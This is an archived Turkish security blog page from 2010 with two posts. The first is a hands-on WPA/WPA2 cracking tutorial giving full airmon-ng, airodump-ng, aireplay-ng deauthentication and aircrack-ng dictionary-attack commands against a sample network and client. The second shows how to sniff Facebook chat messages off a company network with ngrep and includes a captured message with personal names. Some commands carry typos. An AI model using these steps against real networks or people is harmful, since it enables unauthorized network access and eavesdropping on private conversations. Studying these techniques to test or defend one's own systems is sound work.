Archive for June, 2010

Kablosuz Ağları Kırmak ve Kablosuz Ağ Güvenliği 2 – WPA Crack

Kablosuz ağların güvenliği ve kırılması ile ilgili bir önceki yazımızda kablosuz ağ şifreleme algoritması olan WEP güvenliğine ve kırılmasına değinmiştik.Bu eğitim videosunu sitemizden online olarak izleyebildiğiniz gibi http://www.4shared.com/file/96X1unbu/wireless-hacking.html adresinden indirebilirsinizde. Şu ana kadar toplamda 2,530 ~ defa indirilmesi ve bu konuda aldığım mailler konunun hassasiyetini ortaya koyuyor : ))

Konunun devamı niteliğinde olan bu yazıda WPA/WPA2 paylaşımlı anahtarını kullanan networklerin nasıl kırılabileceğini uygulamalı olarak bulabilirsiniz.

Bazı terimler ve değerleri ;
Hedef ağa bağlı istemcinin MAC adresi : 00:1E:4C:43:A6:3E
BSSID (Access Point Cihazının MAC Adresi ) : 00:73:07:38:94:C7
ESSID (Kablosuz ağın ismi) : EVEREST
Access point kanal numarası : 11
Kablosuz ağ arabimi : wlan1

Basit haliyle saldırı adımları ;

  1. Kablosuz ağ arabirimi access pointin yayın yaptığı kanal için monitor moda alınır
  2. airodump-ng ile access point’in bulunduğu kanalı dinleyip authentication handshake paketlerini yakalamaya başlanır
  3. Wireless istemcisine aireplay-ng ile deuthentication paketleri göndererek wireless ağdan düşürülüp, tekrar bağlanması sağlanır
  4. aircrack-ng yazılımı çalıştırılarak authentication handshake paketlerinden paylaşımlı anahtar elde edilmeye çalışılır.

ADIM 1 : Wireless ağ arabirimini monitor moda almak
airmon-ng start wlan1 11

airmon-ng start wlan1 11 monitor mode

Adım 2 : airdump-ng ile auth. handshake paketlerinin yakalanması

Çevrede yayın yapan kablosuz ağları tespit etmek için ;
airodump-ng –channel 11 –encyrpt wpa wlan1

airodump-ng --encrypte wpa wlan1

11. kanalda wpa şifrelemesi ile yayın yapan EVEREST kablosuz ağını dinlemeye alıyoruz ;
airodump-ng –channel 11 –encyrpt wpa –bssid 00:14:6C:7E:40:80 -w lol wlan1

  • –channel parametresi ile kanal (channel) numarası belirtilir
  • –encyrpt parametresi ile şifreleme algoritması (wpa)  belirtilir
  • –bssid hedef Access Point’in mac adresi
  • -w ile yakalanan paketlerin yazılacağı dosya ismi

airodump-ng --channel 11 --encyrpt wpa --bssid 00:14:6C:7E:40:80 -w lol wlan1

Adım 3 : aireplay-ng ile wireless istemcisini kimlikdoğrulamaya zorlamak

Bu işlem opsiyoneldir, isterseniz bir istemcinin kablosuz ağa dahil olup handshake paketlerini yakalamayı bekleyebilirsiniz veya deauth. paketleri gönderip kablosuz ağa bağlı istemciniyi düşürüp tekrar bağlanmasını sağlayabilirsiniz böylelikle zaman kaybetmeden istiyacımız olan handshake paketini yakalamış oluruz. Detaylar burada = http://www.aircrack-ng.org/doku.php?id=deauthentication

aireplay-ng -0 5  -a 00:73:07:38:94:C7 -c 00:1E4C:43:A6:3E wlan1

  • -0  deauthentication paketi hazırlar
  • 5 toplam paket sayısı
  • -a Access point’in mac adresi
  • -c İstemcinin mac adresi
  • wlan1 kullanılacak ağ arabirimi

aireplay-ng -0 5 -a 00:73:07:38:94:C7 -c 00:1E4C:43:A6:3E wlan1

Bu adımı gerçekleştirdikden hemen sonra, deauth. saldırısı başarılımı ve  handshake yakalamışmıyız bakmak için airodump-ng ekranına geçiş yapabiliriz

airodump-ng handshake

Deuthentication ve Authentication paketlerinin detaylarını merak ediyorsanız, bu işlem sırasında wireshark ile paket analizi yapabilirsiniz.

wireshark deauthentication packages

wireshark wireless authentication packages

Adım 4:  airecrack-ng ile paylaşımlı anahtarın kırılması

Yakaladığımız paketlerden paylaşımlı anahtarı kırmak için geniş bir parola veritabanımız/sözlüğümüz olmalı. Eğer hedef sistemin parolası bizim sözlüğümüzde yoksa parolayı elde etmek bir ömür sürebilir.Bu için bakınız. “parola kırma teknikleri”

airecrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -c lol-o1.cap

  • -w wordlist/sözlük/parola veritabanının yolunu belirtir
  • -c .cap dosyasının yolunu belirtir

airecrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -c lol-o1.cap

Mutlu son : ))

2010
06/07
POSTED BY
CATEGORY
Wireless
TAGS





13 comments

Facebook chat forensic – Chat Kayıtları

Facebook sosyal paylaşım sitesinin güzel bir chat uygulaması var. Bu uygulama ile iki taraf arasındaki yazışmalar http protokolü ile clear text geçiyor.Firmamızdan kimlerin facebook’da neler yazıştığını görmek veya kaydedilmiş bir trafiği analiz ederken bu bilgileri elde etmek isteyebiliriz.
Yazışmalar www.facebook.com adresinin /ajax/chat/send.php sayfasına POST ediliyor ;
paros proxy facebook

Yukarıdaki işlemden sonra ağ üzerinden facebook konuşmalarını sniff etmek ve  trafiğin içeriğini analiz etmek için ” Ngrep ” kullanabiliriz.

coslat@ubuntucuk:~/pcap$ sudo ngrep -q -w ‘”msg”\:\{“text”\:’
[sudo] password for coslat:
interface: eth0 (192.168.5.0/255.255.255.0)
match: ((^”msg”\:\{“text”\:\W)|(\W”msg”\:\{“text”\:$)|(\W”msg”\:\{“text”\:\W))

T 69.63.176.213:80 -> 192.168.5.205:48378 [AP]
for (;;);{“t”:”msg”,”c”:”p_1616101186″,”ms”:[{"type":"msg","msg":{"text":"senin icin o bir hackerdir diyorlar : ))","time":1274795227833,"clientTime"
:1274795226505,"msgID":"1888589236"},"from":1616101186,"to":1306752669,"from_name":"Ozan U\u00e7ar","to_name":"Osman Ta\u015fk\u0131n","from_first_na
me":"Ozan","to_first_name":"Osman"}]}

Facebook Chat kayıtlarını parse edip düzenli bir çıktı üretecek bir programcık yolda, bitince bu sayfadan facebook chat zımbırtısı v1. yayımlanıcaktır.

2010
06/03
POSTED BY
CATEGORY
Ethical Hacker
Network Forensics
TAGS

3 comments

Recent entry

Archive

Category

 
Hosting Sponsorumuz